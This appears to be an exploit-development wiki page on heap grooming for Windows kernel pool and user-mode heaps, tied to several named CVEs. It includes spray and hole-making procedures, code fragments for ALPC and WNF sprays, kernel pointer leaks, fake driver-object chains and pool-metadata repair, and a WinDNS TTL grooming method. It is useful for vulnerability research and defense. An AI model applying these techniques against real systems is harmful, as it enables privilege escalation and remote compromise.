Heap Grooming
Last updated: 2026-04-11
Related: Pool Internals, Heap Internals, Use After Free, Cve 2021 31969, Cve 2024 30085, Cve 2021 31956, Wnf Internals, Cve 2020 1350
Tags:user-mode,kernel-mode,pool
Summary
Heap grooming (also called heap feng shui) is the art of manipulating heap layout to deterministically place objects adjacent to each other. It is a prerequisite for reliable exploitation of any memory corruption bug — without grooming, exploits are unreliable. This page documents grooming strategies for both kernel pool and user-mode heap.
Core Principle
Goal: when a vulnerable allocation occurs, ensure:
[ATTACKER OBJECT][VULNERABLE OBJECT][ATTACKER OBJECT]
or
[VULNERABLE OBJECT][ATTACKER OBJECT] ← overflow from left
So that: overflowing/corrupting vulnerable object hits controlled data.
Heap allocators are deterministic given the same sequence of alloc/free operations. Grooming exploits this determinism.
LFH Grooming (Modern — Both Kernel and User-Mode Segment Heap)
LFH is activated per-bucket after ≥18 allocations of that size. Within an LFH subsegment, all blocks are the same size and packed contiguously.
LFH Grooming Procedure
Phase 1: Activate LFH for target bucket
→ allocate ≥18 objects of target size
Phase 2: Fill the subsegment (spray)
→ allocate N more objects (fill current subsegment, force new subsegment creation)
→ N ≈ subsegment_size / block_size (typically 128-256 objects)
Phase 3: Create holes
→ free every-other object (or specific pattern)
→ creates alternating free/busy pattern: [F][B][F][B][F][B]...
Phase 4: Trigger vulnerable allocation
→ vulnerable object allocated into a free slot: [F][VULN][F][B][F]...
Phase 5: Fill holes with attacker objects
→ allocate same-size attacker objects to fill remaining free slots
→ layout: [ATK][VULN][ATK][B][ATK]...
Phase 6: Trigger overflow/corruption
→ VULN overflows/underflows → hits ATK data
Size Bucket Matching
LFH bucket for size s (NT Heap):
- 1–1024 bytes: 8-byte granularity → bucket = ceil(s/8)
- 1025–4096: 16-byte granularity
- Etc.
For Segment Heap: similar bucketing, exact sizes differ.
Critical: vulnerable object and attacker object must be in the SAME LFH bucket. If they differ by even 1 byte and land in different buckets → layout not guaranteed.
VS (Variable Size) Segment Grooming
For allocations not in LFH (large or infrequent allocations):
Phase 1: Defragment
→ allocate many large objects to fill existing free chunks
→ creates a "clean slate" at end of segment
Phase 2: Spray
→ allocate N controlled objects of exact size
→ they land contiguously at end of current segment
Phase 3: Create gap
→ free one controlled object in the middle of the spray
→ creates a hole of exact right size
Phase 4: Trigger vulnerable alloc
→ vulnerable object should land in the hole
Phase 5: Verify (debug only)
→ read back attacker objects to confirm layout
Kernel Pool Grooming
NonPaged Pool Grooming (Pre-20H1)
Best grooming objects from user mode:
- Named pipe write buffers (Paged Pool):
WriteFileto blocking named pipe, size = allocation size - 8 (header) NtSetValueKey(registry): write registry value → kernel allocates Paged Pool buffer of controlled sizePIPE_ATTRIBUTE: extremely flexible, Paged Pool, variable size, header-free body- Event objects (
NtCreateEvent): NonPagedPool, fixed small size (~0x40)
Kernel Pool Grooming Procedure (Legacy)
1. Exhaust current free list for target size
→ allocate many spray objects to fill free list
2. Allocate vulnerable object
→ lands at end of fresh pool page
3. Allocate attacker object immediately after
→ layout: [VULN_OBJ][ATTACKER_OBJ]
4. Trigger overflow in VULN_OBJ
→ corrupt ATTACKER_OBJ header/body
Segment Heap Kernel Grooming (Post-20H1)
Must use LFH exploitation strategy (see above). Key difference:
- No chunk headers between LFH blocks → overflow hits object data directly
- Subsegment bitmap controls allocation → can be manipulated for double-alloc primitive
Pool tag matters: grooming objects must be in same pool (NonPaged vs Paged). Named pipe buffers go to Paged Pool; event objects go to NonPaged Pool.
WNF_STATE_DATA + KeyedEvent Spray (Paged Pool — CVE-2024-26170 Pattern)
Used in the CimFS CVE-2024-26170 exploit to groom paged pool around an OOB-read victim allocation.
Objects
| Object | Size | Pool | How to allocate |
|---|---|---|---|
_WNF_STATE_DATA | 0x880 bytes | Paged Pool | NtCreateWnfStateName() + NtUpdateWnfStateData() with 0x880-byte payload |
KeyedEvent | 0x680 bytes | Paged Pool | NtCreateKeyedEvent() |
Strategy
Phase 1 — Fill pool pages with WNF spray:
Allocate N × _WNF_STATE_DATA (0x880) objects
Goal: force two specific objects onto the SAME page (contiguous)
Phase 2 — Create holes for victim:
Free 1/4 of the WNF objects
This creates evenly-spaced free blocks on the page
Phase 3 — Trigger victim allocation:
The target allocation (from driver IOCTL processing) falls into a hole
Now: [WNF spray][victim][WNF spray] on same page
Phase 4 — OOB read reaches spray:
Unvalidated offset calculation reaches adjacent WNF_STATE_DATA
Reads fake PFILE_OBJECT from WNF payload
Payload Structure in WNF Data
The 0x880-byte WNF payload contains a complete fake object chain:
[0x00] Fake FILE_OBJECT
FileObject->DeviceObject → ptr to fake DEVICE_OBJECT
[0x??] Fake DEVICE_OBJECT
DeviceObject->DriverObject → ptr to fake DRIVER_OBJECT
[0x??] Fake DRIVER_OBJECT
DriverObject->MajorFunction[3] → gadget_address
When the OOB read dereferences this, IoGetRelatedDeviceObject() + IofCallDriver() invoke the gadget.
Why WNF_STATE_DATA Works
- Large enough (0x880) to hold the full fake object chain within one allocation
- Allocated in paged pool — matches the victim driver’s allocation pool
NtUpdateWnfStateDataallows arbitrary payload content- Can spray hundreds of these cheaply
KeyedEvent Role
KeyedEvent objects (0x680) fill the remaining slots between WNF objects to:
- Prevent fragmentation from other background allocations
- Stabilize the page layout by saturating remaining free space
- Ensure the victim falls in the precise WNF-adjacent hole
See Cve 2024 26170 for the complete exploit using this pattern.
ALPC Handle Table Spray (Paged Pool 0x1000 — CVE-2024-30085 Pattern)
Used to place a 0x1000-byte paged pool object adjacent to a pool overflow victim, then leak its kernel pointer.
Object: _ALPC_HANDLE_TABLE
struct _ALPC_HANDLE_TABLE {
struct _ALPC_HANDLE_ENTRY* Handles; //0x0 ← kernel pointer we want to leak
struct _EX_PUSH_LOCK Lock; //0x8
ULONGLONG TotalHandles; //0x10
ULONG Flags; //0x18
};
- Initial size: 0x80 bytes
- Each
NtAlpcCreateResourceReservecall adds a_KALPC_RESERVEentry - When table is full, it’s reallocated at doubled size: 0x80 → 0x100 → 0x200 → 0x400 → 0x800 → 0x1000
- At 0x1000, the table lands in the VS segment (paged pool), matching the overflow victim size
Growing to 0x1000
// Create ALPC server port
NtAlpcCreatePort(&hPort, &portObjAttr, &portAttr);
// Fill handle table from 0x80 to 0x1000 via repeated reserve allocation
for (int j = 0; j < 127; j++)
NtAlpcCreateResourceReserve(hPort, 0, 0x28, &hResource);
// 127 entries fills 0x80→0x1000 through doublings
Spray 0x800 ALPC ports to fill 0x1000 holes
#define NUM_ALPC 0x800
HANDLE ports[NUM_ALPC];
CreateALPCPorts(ports, NUM_ALPC);
AllocateALPCReserveHandles(ports, NUM_ALPC, reservesCount - 1);
Leak via Corrupted WNF
After an overflow corrupts _WNF_STATE_DATA.DataSize by 8 bytes (0xff0 → 0xff8), the WNF reads 8 bytes past its data boundary into the adjacent ALPC handle table:
// The leaked value at WNFOutput[0xff0] is Handles pointer from _ALPC_HANDLE_TABLE
ALPC_leak = *((unsigned long long*)(WNFOutput + 0xff0));
// Walk: KALPC_RESERVE → ALPC_PORT → EPROCESS+0x18 → Token+0x4b8
See Cve 2024 30085 for complete flow.
WNF 0xC0 Paged Pool Spray (CVE-2021-31956 Pattern)
First published use of WNF structures as paged pool grooming objects (Alex Plaskett, NCC Group, 2021). The key insight: WNF allocations go to paged pool and are precisely size-controlled from user-mode — making them ideal for placing adjacent to paged-pool overflow victims.
Objects and Sizes
_WNF_NAME_INSTANCE:
Size = 0xA8 bytes (fixed struct) + 0x10 pool header → chunk 0xB8 → rounds to 0xC0 LFH bucket
_WNF_STATE_DATA (variable body):
ExAllocatePoolWithQuotaTag(PagedPool, dataLen + 0x10, 'WNF ')
To land in 0xC0 bucket: dataLen = 0xA0 → chunk = 0xA0 + 0x10 (WNF header) + 0x10 (pool hdr) = 0xC0
Overflow victim (NtFE — NTFS EA):
NtQueryEaFile(..., Length = firstEaBlockSize)
→ allocates output buffer = firstEaBlockSize bytes
For 0xC0 bucket: Length = 0xB0 → 0xB0 + 0x10 pool header = 0xC0
All three objects — _WNF_STATE_DATA, _WNF_NAME_INSTANCE, and the NTFS EA output buffer — share the same 0xC0 LFH bucket in paged pool.
Allocation API
// Allocate _WNF_NAME_INSTANCE + _WNF_STATE_DATA (dataLen bytes body):
NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine,
FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, dataLen, 0, 0, 0, 0);
// → ExAllocatePoolWithQuotaTag(PagedPool, dataLen + 0x10, 'WNF ')
Strategy
Phase 1 — Spray 0xC0 paged pool with WNF objects:
Allocate N × WNF state names with dataLen=0xA0 (→ WNF_STATE_DATA 0xC0)
AND N × WNF_NAME_INSTANCE (each 0xC0)
Goal: fill the 0xC0 LFH subsegment
Phase 2 — Create holes:
Free every-other WNF state name → alternating free/busy pattern
Phase 3 — Trigger victim allocation:
NtQueryEaFile(Length = 0xB0) → NtFE victim allocated into a hole
Layout: [WNF][NtFE victim][WNF]..
Phase 4 — Trigger overflow:
NtQueryEaFile EA2 causes integer underflow → controlled memmove past victim
Overflow of 0x10 bytes past victim end hits adjacent WNF object:
If WNF_STATE_DATA: corrupts Header+AllocatedSize+DataSize+ChangeStamp at +0x0/+0x4/+0x8/+0xC
If WNF_NAME_INSTANCE: corrupts Header+RunRef at +0x0/+0x8
Phase 5 — Detect corrupted WNF_STATE_DATA:
NtQueryWnfStateData all state names; find one with unexpectedly large DataSize
→ identified corrupted WNF_STATE_DATA → OOB read/write relative to that object
Why WNF_STATE_DATA Corruption is Exploitable
Setting DataSize larger than the real allocation enables:
- OOB read:
NtQueryWnfStateDatacopiesDataSizebytes from the WNF payload → reads past the end of the allocation into adjacent paged pool objects - OOB write:
NtUpdateWnfStateDatacopies user data into the WNF payload up toDataSizebytes → writes into adjacent objects
From there, pivot to _WNF_NAME_INSTANCE corruption (overwrite StateData pointer → controlled AAR/AAW) or read CreatorProcess (+0x98) for an EPROCESS leak without any separate KASLR bypass.
See Wnf Internals for complete WNF structure reference and Cve 2021 31956 for full exploit chain.
Cross-Subsegment LFH → VS Overflow (CVE-2021-31969 Pattern)
Used when the overflow victim is a tiny LFH object (e.g., 0x20 bytes) but the target for corruption must be a VS-subsegment object (e.g., WNF at 0x1000 bytes). Standard LFH grooming cannot bridge the gap — this technique exhausts both LFH and VS allocator state to force them adjacent.
The Challenge
The HsRp allocation in CVE-2021-31969 is 0x20 bytes → LFH bucket. Under LFH, the victim chunk can only be adjacent to other 0x20-byte objects. WNF_STATE_DATA is 0x1000 bytes → VS segment. They cannot be adjacent under normal conditions.
Key Insight
LFH buckets (fixed-size, managed by LFH frontend) and VS subsegments (variable-size, managed by VS frontend) can be physically contiguous in pool memory when both the LFH backend and VS backend allocate new segments simultaneously.
Procedure
Step 1 — Exhaust all existing 0x20 LFH buckets:
Spray _TERMINATION_PORT objects (NtRegisterThreadTerminatePort)
→ forces LFH backend to allocate a fresh 0x20 LFH segment
→ new LFH segment appears at current pool high water mark
Step 2 — Exhaust all existing VS subsegments:
Spray _WNF_STATE_DATA (DataSize=0xff0 → 0x1000 alloc) + _TOKEN objects
→ forces VS allocator to create a new VS subsegment
→ new VS subsegment appears adjacent to (or near) the new LFH segment
Step 3 — Overflow past the LFH segment:
Trigger overflow of up to ~4 pages of DWORD(0x1000) values
If fewer than 4 LFH pages exist between victim and VS subsegment:
overflow crosses the LFH boundary into the VS subsegment
Step 4 — WNF gets overwritten:
DWORD(0x1000) values overwrite WNF_STATE_DATA.AllocatedSize = 0x1000
WNF_STATE_DATA.DataSize = 0x1000
→ page-sized OOB read/write via NtQueryWnfStateData/NtUpdateWnfStateData
Spray Object: _TERMINATION_PORT (0x20 LFH filler)
struct _TERMINATION_PORT {
struct _TERMINATION_PORT* Next; //0x0
VOID* Port; //0x8
};
// Allocated via NtRegisterThreadTerminatePort(alpcPortHandle)
// Freed when thread terminates — use a worker thread with synchronized exit
Reliability
This technique requires luck with layout — pool spray must exhaust both allocators simultaneously. Run sufficient spray volume (thousands of objects) to maximize the probability that new LFH and VS segments land adjacent. Expect <100% reliability; tune based on crash vs. success ratio.
See Cve 2021 31969 for full implementation.
Cross-Cache / Cross-Pool Grooming
When vulnerable object and attacker object must be in different pools/caches, grooming becomes harder:
- Must cause pools to grow into the same page (uncommon but possible with careful timing)
- Alternative: find an object in the same pool as vulnerable object that you can control
Measuring Grooming Success
Debug Approach
- Enable heap metadata tracing (ETW heap events)
- Allocate spray objects → record their addresses
- Trigger target allocation → check address
- Calculate relative distance from nearest spray object
Production Approach (Reliability Engineering)
- Run exploit 100+ times in controlled environment
- Measure % of runs where grooming succeeded
- Tune phase 2 (spray count) and phase 3 (hole creation pattern) until >90% reliable
Grooming Anti-Patterns
| Mistake | Effect |
|---|---|
| Wrong LFH bucket | Objects in different subsegments → layout non-deterministic |
| Too few spray objects | Holes in other pages get filled first |
| Not activating LFH first | VS segment used → non-contiguous layout |
| Pool type mismatch | Attacker objects in Paged Pool, vulnerable in NonPaged → never adjacent |
| Not draining lookaside first | Lookaside list returns stale chunks before reaching target region |
_WNF_NAME_INSTANCES Pre-Spray (Preventing LFH Pollution)
When spraying _WNF_STATE_DATA objects to fill a VS subsegment, a side-effect is that each WNF allocation also creates a companion _WNF_NAME_INSTANCES object (size ~0xD0). Without mitigation, these 0xD0 allocations cause the LFH frontend to create an additional 0xD0 LFH segment, which may fall between the intended LFH and VS subsegments, disrupting the cross-subsegment layout.
Solution: Pre-spray 0xD0 pool holes before the main spray:
for (UINT i = 0; i < 0x4000; i++)
AllocateWnfObject(0xD0, &gStateName[i]);
for (UINT i = 0; i < 0x4000; i++)
NtDeleteWnfStateName(&gStateName[i]);
// Now WNF_NAME_INSTANCES objects land in pre-existing holes,
// not in new LFH segments that would disrupt layout
Used in CVE-2022-22715 (Windows Dirty Pipe). Cross-reference: Wnf Internals.
VS Pool RBTree Repair (Post-OOB-Write Cleanup)
When a massive OOB write (e.g., CVE-2022-22715’s 0xFFFE-byte write) corrupts the VS subsegment’s Red-Black Tree metadata alongside object content, the Segment Heap allocator will BSOD on the next allocation or free because it dereferences the corrupted tree node pointers.
Each VS subsegment RBTree node layout:
+0x00 Left child pointer
+0x08 Right child pointer
+0x10 Parent pointer
Fix procedure (requires arbitrary R/W already established via PreviousMode flip):
- Compute VS pool manager address from known globals + pool chunk address:
// CVE-2022-22715 formula: UINT64 pHpMgr = (globalHeap ^ pPoolChunkAddr ^ pPoolChunkValue ^ 0xA2E64EADA2E64EAD) - 0x100 + 0x290; - Walk the RBTree from root (pHpMgr → left child), traversing toward the corrupted chunk’s address:
// Navigate: if target < current → go left; if target > current → go right // When found: overwrite node with fake node (zero children, relink parent) WriteKernel(corruptNode + 0x00, 0); // null left child WriteKernel(corruptNode + 0x08, 0); // null right child WriteKernel(corruptNode + 0x10, parentPtr); // maintain parent link - Traverse from both left and right subtrees of root to catch all paths to the corrupt node
Cost: Any VS chunks parented under the deleted node become unreachable (memory leak), but the system no longer crashes. Acceptable trade-off for a stable exploit.
Used in CVE-2022-22715. See also Cve 2022 22715.
Application-Specific Custom Allocator Grooming (WinDNS / CVE-2020-1350 Pattern)
When a target service maintains its own memory pool (rather than using the OS allocator directly), grooming must understand that allocator’s semantics. WinDNS (dns.exe) is the canonical example.
WinDNS Custom Allocator Properties
- Buckets: 0x50, 0x68, 0x88, 0xA0 (singly linked LIFO freelists)
- > 0xA0: delegates to
HeapAlloc - Freed objects: pushed back onto bucket freelist, never returned to native heap
- Chunk isolation: native heap chunks (
0xFF0/0xFA0sized) contain only WinDNS bucket buffers — no mixing with other application allocations - Chunk contiguity: spray order = allocation order within a new native chunk (LIFO within chunk)
This isolation means: if the overflow buffer is < 0xA0 bytes, the overflow walks into other WinDNS bucket buffers, never into OS heap metadata or unrelated data.
TTL as Heap Primitive
The DNS server’s record cache respects TTL values set by the responding DNS server. In CVE-2020-1350, the attacker is the responding DNS server:
| TTL value | Effect |
|---|---|
| Long TTL | Record cached indefinitely → buffer stays allocated |
| Short TTL | Record freed after ~2 minutes (next cache cleanup cycle) |
dwTTL = 0 + dwTimeStamp = 0 in fake record | Record treated as already expired → freed on next DNS query for that name |
The zero-TTL trick enables immediate controlled free without waiting 2 minutes — critical for the later staged exploitation.
Hole-Making Procedure (Avoid SEGFAULT)
1. Heap spray: send many subdomain queries → malicious DNS server responds with
records (long TTL) → victim caches them → fills WinDNS bucket heap
2. Assign short TTL to exactly one subdomain (the "target" slot)
3. Wait ~2 minutes for WinDNS cleanup to free the target record buffer
4. Re-query the target subdomain with the malformed SIG payload
→ LIFO: new allocation lands in the exactly freed slot
→ overflow stays within the already-mapped heap segment → no SEGFAULT
Grooming to Avoid Cache Tree Corruption
The DNS record cache is a binary tree. Tree nodes are 0x88-byte objects (Bucket 3). When a new 0xFF0 native heap chunk is allocated for Bucket 3, tree nodes appear adjacent to spray buffers:
Fix:
- Pre-exhaust the Bucket 3 freelist: allocate many 0x88-byte records, then expire them. They go back onto the freelist.
- Subsequent tree node allocations consume the freelist entries → no new native heap chunks needed → tree nodes never appear adjacent to the spray region.
- Spray enough
0xA0records to fill an entire new native chunk — the overflow target and its neighbours are now exclusively attacker-controlled0xA0records.
Controlling Reallocation (Fake wRecordSize)
By overwriting RR_Record.wRecordSize in a fake record, the exploit forges which bucket size is reported when the buffer is “freed” via the zero-TTL trick. The LIFO allocator then serves the next allocation of that bucket size from the controlled slot:
Fake RR_Record.wRecordSize = 0x50
→ Free fake record (zero TTL query)
→ Buffer pushed back onto 0x50 bucket freelist
→ Next 0x50 allocation (e.g., DNS_Timeout object) lands in this slot
This is the mechanism for injecting arbitrary object types into the controlled heap region.
Key Contrast with Kernel Pool Grooming
| Property | Kernel Pool (Segment Heap LFH) | WinDNS Custom Allocator |
|---|---|---|
| Allocation order | LFH: pseudo-random within subsegment | LIFO: fully deterministic |
| Free behavior | Returns to LFH bitmap | Returns to bucket freelist (LIFO) |
| Bucket activation | ≥18 allocs | Always active |
| External mixing | Other kernel objects share page | Isolated — only WinDNS objects in chunk |
| Heap primitive | Race/timing sensitive | TTL (attacker-controlled DNS response) |
See Cve 2020 1350 for the complete exploit chain.
Exploit Relevance
Grooming is the difference between a crash and a working exploit. Budget significant time on grooming — it’s often 50%+ of exploit development work. Reliability below 70% in lab = unreliable in production due to ASLR and system load variation.
References
- “Heap Feng Shui in Javascript” — Alexander Sotirov (pioneered the concept)
- “Kernel Pool Exploitation” — Tarjei Mandt (Azimuth Security)
- “Pool Party” — SafeBreach Labs (2023) — novel Windows thread pool grooming
- “Exploiting Windows Kernel Pool” — Valentina Palmiotti, OffensiveCon 2021
- Corelan heap exploitation tutorials — corelan.be
